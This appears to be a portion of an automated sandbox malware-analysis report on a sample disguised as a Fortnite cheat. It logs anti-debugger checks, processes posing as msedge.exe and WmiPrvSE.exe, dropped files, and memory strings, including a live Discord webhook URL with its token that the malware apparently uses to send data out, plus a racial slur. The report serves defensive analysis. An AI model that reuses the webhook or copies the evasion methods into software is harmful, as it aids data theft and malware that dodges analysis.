                                Source: seoI30IZZr.exeBinary or memory string: IMGUI_IMPL_DX9IMGUI_IMPL_WIN32#SCROLLX#SCROLLY[X][ ]-------------------------------- |##COMBO_%02D*UNKNOWN ITEM*%I64U%LF%.*S%%D%SUNKNOWN EXCEPTIONBAD ARRAY NEW LENGTHSTRING TOO LONG: GENERICBAD CASTC\\.\ORQUR-ONTOP-FUCKING-NIGGERNPC][##RADARNTDLL.DLLNTQUERYINFORMATIONPROCESSISDEBUGGERPRESENTKERNEL32.DLLNTSETINFORMATIONTHREADOLLYDBG.EXEX64DBG.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEGHIDRA.EXEWINDBG.EXEOLLYDBGWINDBGFRAMECLASSIDAVW64IDAVW32DBGHELP.DLLDBGCORE.DLL: "", "EXISTSSUCCESSHTTPS://DISCORD.COM/API/WEBHOOKS/1247249666907701321/MHNII9J0YWG308W-RJBT6RXKALF0IFLJIGI4SGWLEDUFWWOFGLNFE9ULMGNRQPPHDYLKHTTPS://AUTH.GG/HEADNECKCHESTRANDOMLEFT MOUSERIGHT MOUSEMIDDLE MOUSEMOUSE 5MOUSE 4BACKSPACEENTERSHIFTCONTROLALTPAUSECAPSESCAPESPACEPAGE UPPAGE DOWNENDHOMELEFTUPRIGHTDOWNPRINTINSERTDELETE046789DEFGHIJKLMNOPQRSTUVWNUMPAD 0NUMPAD 1NUMPAD 2NUMPAD 3NUMPAD 4NUMPAD 5NUMPAD 6NUMPAD 7NUMPAD 8NUMPAD 9MULTIPLYADDSUBTRACTDECIMALDIVIDEF1F2F3F4F5F6F7F8F9F10F11F12SELECT KEYPRESS KEYC:\WINDOWS\FONTS\IMPACT.TTFFORTNITEWINVERSHOTGUNORQUR PUBLIC
                                Source: seoI30IZZr.exeBinary or memory string: OLLYDBG.EXE
                                Source: seoI30IZZr.exeBinary or memory string: X64DBG.EXE
                                Source: seoI30IZZr.exeBinary or memory string: WINDBG.EXE
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: 2C60000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Edge\msedge.exeMemory allocated: 750000 memory reserve | memory write watchJump to behavior
                                Source: C:\Edge\msedge.exeMemory allocated: 1A780000 memory reserve | memory write watchJump to behavior
                                Source: C:\Edge\msedge.exeMemory allocated: 15D0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1B040000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: F40000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1A9F0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeMemory allocated: D80000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeMemory allocated: 1ACA0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1790000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1B080000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeMemory allocated: 14C0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeMemory allocated: 1AE40000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786614BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF786614BD0
                                Source: C:\Windows\Speech\physmeme.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9141
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9178
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\jsWPmlvb.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\KiGKqBgX.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\oYbYVUjG.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\AznuGYbp.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\rWfFWfLI.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\EagcoYZU.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\OJAsYAeC.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\IlfCUBRc.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\ERJdElGX.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\mOEXVCEF.logJump to dropped file
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeAPI coverage: 5.3 %
                                Source: C:\Windows\Speech\physmeme.exe TID: 1288Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5420Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Edge\msedge.exe TID: 3524Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep count: 9141 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784Thread sleep time: -11068046444225724s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4820Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1292Thread sleep count: 9178 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6724Thread sleep time: -9223372036854770s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 6012Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 2756Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exe TID: 3020Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 6916Thread sleep time: -30000s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 2264Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exe TID: 3164Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662DB3C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF78662DB3C
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0060A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_2_0060A69B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0061C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,5_2_0061C220
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0062B348 FindFirstFileExA,5_2_0062B348
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0061E6A3 VirtualQuery,GetSystemInfo,5_2_0061E6A3
                                Source: C:\Windows\Speech\physmeme.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                Source: msedge.exe, 00000033.00000002.2146483531.000000001BAE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
                                Source: msedge.exe, 00000033.00000002.2125912373.000000001312A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: aZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                Source: kdmapper.exe, 00000005.00000003.1500381537.0000000003031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: RegAsm.exe, 0000000C.00000002.1538540291.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: curl.exe, 00000007.00000003.1508973721.000001B321123000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.1509387760.000001B321126000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1509003906.000001B321125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                                Source: curl.exe, 00000004.00000003.1492352878.0000019B0A2B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM
                                Source: C:\Windows\Speech\kdmapper.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786614BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF786614BD0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeOpen window title or class name: windbgframeclass
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeOpen window title or class name: ollydbg.exe
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00446730 LdrInitializeThunk,12_2_00446730
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786614BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF786614BD0
